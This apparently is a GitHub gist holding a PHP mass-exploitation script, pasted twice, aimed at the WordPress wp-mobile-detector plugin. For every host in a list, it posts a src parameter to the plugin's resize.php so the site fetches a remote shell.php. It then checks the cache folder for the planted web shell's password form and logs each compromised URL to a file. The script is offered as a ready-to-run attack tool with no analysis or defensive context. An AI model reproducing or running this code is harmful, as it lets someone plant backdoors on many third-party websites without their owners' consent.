winstrool/gist:28acb84721e99655b2fea087ada4e58b

## gistfile1.txt
<?php
set_time_limit(0);
error_reporting(0);

$get_url=file('url.txt');
$shell_url="http://localhost/shell.php";

function curl($url='', $post='', $referer='', $proxy='')
{
        $cl = curl_init();
    curl_setopt($cl, CURLOPT_URL, $url);
    curl_setopt($cl, CURLOPT_RETURNTRANSFER,1);
    curl_setopt($cl, CURLOPT_HEADER, 0);
    curl_setopt($cl, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($cl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($cl, CURLOPT_USERAGENT, 'Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.2.15 Version/10.10');
   #curl_setopt($cl, CURLOPT_ENCODING, 'gzip, deflate');
    curl_setopt($cl, CURLOPT_COOKIEJAR, $_SERVER['DOCUMENT_ROOT'].'/cookie.txt');
    curl_setopt($cl, CURLOPT_COOKIEFILE, $_SERVER['DOCUMENT_ROOT'].'/cookie.txt');
    if(!empty($post)) {
   curl_setopt($cl, CURLOPT_POST, 1);

   curl_setopt($cl, CURLOPT_POSTFIELDS, $post);}
      else{
      curl_setopt($cl, CURLOPT_POST, 0);}

    if(!empty($referer)){
      curl_setopt($cl, CURLOPT_REFERER, $referer);}
      else{
      curl_setopt($cl,CURLOPT_REFERER, 1);}

    if(!empty($proxy)) {
   curl_setopt($cl, CURLOPT_PROXY, $proxy);}

    $ex=curl_exec($cl);
   #$ex=iconv('cp1251','UTF8',$ex);
    curl_close($cl);
        return $ex;
}

for($i=0;$i<count($get_url);$i++){
	curl('http://'.trim($get_url[$i]).'/wp-content/plugins/wp-mobile-detector/resize.php','src='.$shell_url);

		$matches=file_get_contents('http://'.trim($get_url[$i]).'/wp-content/plugins/wp-mobile-detector/cache/shell.php');

    if (preg_match('#input type=password name=pass#', $matches, $o))
    {
echo $i.':: http://'.trim($get_url[$i])."/wp-content/plugins/wp-mobile-detector/cache/shell.php;pass\n";
 file_put_contents('./shell.txt','http://'.trim($get_url[$i])."/wp-content/plugins/wp-mobile-detector/cache/shell.php;pass\n",  FILE_APPEND);
	}

	ob_flush();
	flush();
}


?>
	<?php
	set_time_limit(0);
	error_reporting(0);

	$get_url=file('url.txt');
	$shell_url="http://localhost/shell.php";

	function curl($url='', $post='', $referer='', $proxy='')
	{
	$cl = curl_init();
	curl_setopt($cl, CURLOPT_URL, $url);
	curl_setopt($cl, CURLOPT_RETURNTRANSFER,1);
	curl_setopt($cl, CURLOPT_HEADER, 0);
	curl_setopt($cl, CURLOPT_SSL_VERIFYPEER, 0);
	curl_setopt($cl, CURLOPT_SSL_VERIFYHOST, 0);
	curl_setopt($cl, CURLOPT_USERAGENT, 'Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.2.15 Version/10.10');
	#curl_setopt($cl, CURLOPT_ENCODING, 'gzip, deflate');
	curl_setopt($cl, CURLOPT_COOKIEJAR, $_SERVER['DOCUMENT_ROOT'].'/cookie.txt');
	curl_setopt($cl, CURLOPT_COOKIEFILE, $_SERVER['DOCUMENT_ROOT'].'/cookie.txt');
	if(!empty($post)) {
	curl_setopt($cl, CURLOPT_POST, 1);

	curl_setopt($cl, CURLOPT_POSTFIELDS, $post);}
	else{
	curl_setopt($cl, CURLOPT_POST, 0);}

	if(!empty($referer)){
	curl_setopt($cl, CURLOPT_REFERER, $referer);}
	else{
	curl_setopt($cl,CURLOPT_REFERER, 1);}

	if(!empty($proxy)) {
	curl_setopt($cl, CURLOPT_PROXY, $proxy);}

	$ex=curl_exec($cl);
	#$ex=iconv('cp1251','UTF8',$ex);
	curl_close($cl);
	return $ex;
	}

	for($i=0;$i<count($get_url);$i++){
	curl('http://'.trim($get_url[$i]).'/wp-content/plugins/wp-mobile-detector/resize.php','src='.$shell_url);

	$matches=file_get_contents('http://'.trim($get_url[$i]).'/wp-content/plugins/wp-mobile-detector/cache/shell.php');

	if (preg_match('#input type=password name=pass#', $matches, $o))
	{
	echo $i.':: http://'.trim($get_url[$i])."/wp-content/plugins/wp-mobile-detector/cache/shell.php;pass\n";
	file_put_contents('./shell.txt','http://'.trim($get_url[$i])."/wp-content/plugins/wp-mobile-detector/cache/shell.php;pass\n", FILE_APPEND);
	}

	ob_flush();
	flush();
	}


	?>